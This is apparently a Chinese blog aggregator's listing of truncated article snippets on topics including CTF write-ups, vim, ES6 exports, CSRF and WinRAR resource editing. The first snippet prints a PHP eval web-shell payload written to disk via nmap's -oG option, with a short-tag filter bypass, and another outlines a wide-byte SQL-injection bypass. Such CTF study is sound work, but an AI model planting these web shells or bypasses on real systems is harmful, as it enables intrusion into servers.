和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o ...
分类:
其他好文 时间:
2020-05-29 19:49:08
阅读次数:
352
GitHub 是一个面向开源及私有软件项目的托管平台,因为只支持 Git 作为唯一的版本库格式进行托管,故名 GitHub。对程序员来说,GitHub 是程序员开源精神之所系。在这个神奇的开源社区,职业程序员和编程爱好者畅所欲言,探寻自己感兴趣的项目、分享源代码、交流学习GitHub 于 2008 ...
分类:
其他好文 时间:
2020-05-27 20:41:35
阅读次数:
108
1、下载Resource Hacker 2、用Resource Hacker打开WINRAR.exe安装目录(比如:C:\Program Files\WinRAR\WinRAR.exe)。 3、选择左边树,找到“String Table”,找到80 2052 4、删除1277行内容 5、另存为WIN ...
:s/name/title/g #替换当前行所有 name 为 title 在全部内容的行首添加//号注释:% s/^/\/\//g在2~50行首添加//号注释:2,50 s/^/\/\//g 行首 :%s/^/your_word/ 行尾 :%s/$/your_word/ :%3,$s/^/HACK ...
分类:
其他好文 时间:
2020-05-20 14:33:40
阅读次数:
56
ES6中export一般的用法有两种 命名导出(Named exports) 默认导出(Default exports) 命名导出(Named exports) 就是每一个需要输出的数据类型都要有一个name,统一输入一定要带有{},即便只有一个需要输出的数据类型。这种写法清爽直观,是推荐的写法。 ...
分类:
其他好文 时间:
2020-05-04 15:37:59
阅读次数:
89
CSRF是Cross Site Request Forgery的简称,中文名为跨域请求伪造。在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了。所以CSRF攻击也被称为“one click”攻击。 举一个例子: 张三想 ...
分类:
其他好文 时间:
2020-04-10 12:10:25
阅读次数:
67
从零学起成为一名黑客 如果是想利用学到的技术非法牟利,奉劝尽早放弃,君子爱财取之有道,想成为一名合格的白帽黑客,要遵守“江湖规矩”。 黑客,对于很多人来说,是一个神秘的代名词,加之影视作品夸张的艺术表现,使得黑客这个本来只专注于技术的群体,散发出亦正亦邪的神秘色彩。 黑客源自英文hacker一词,最 ...
分类:
其他好文 时间:
2020-04-07 20:40:05
阅读次数:
106
和武科大WUSTCTF同时打的一场比赛,最后因为精力放在武科大比赛上了,排名13 - -Web题目难度跨度过大,分不清层次,感觉Web题目分布不是很好,质量还是不错的 Ez_bypass 进入题目得到源码: <?php include 'flag.php'; $flag='MRCTF{xxxxxxx ...
分类:
Web程序 时间:
2020-04-02 01:27:47
阅读次数:
158
确定性解法:后缀数组 众所周知 hash 由于不能完全避免冲突常常会被 cf hacker 卡掉,此题有更稳定的解法 考虑将原串进行简化,由于只有连续的 1 会造成不确定的匹配,可以只对 0 建立一个新串 对于一段连续的 1,后面的 0 建立新字符,如果有奇数个 1 就建立 1,偶数个就建立 0 例 ...
分类:
编程语言 时间:
2020-03-06 20:17:11
阅读次数:
71
1.查看一下php文件: check_addslashes()会在单引号前加一个\ 例如:I'm hacker 传入addslashes(),得到:I\'m hacker 本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过: 原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8 ...
分类:
其他好文 时间:
2020-03-03 19:14:12
阅读次数:
91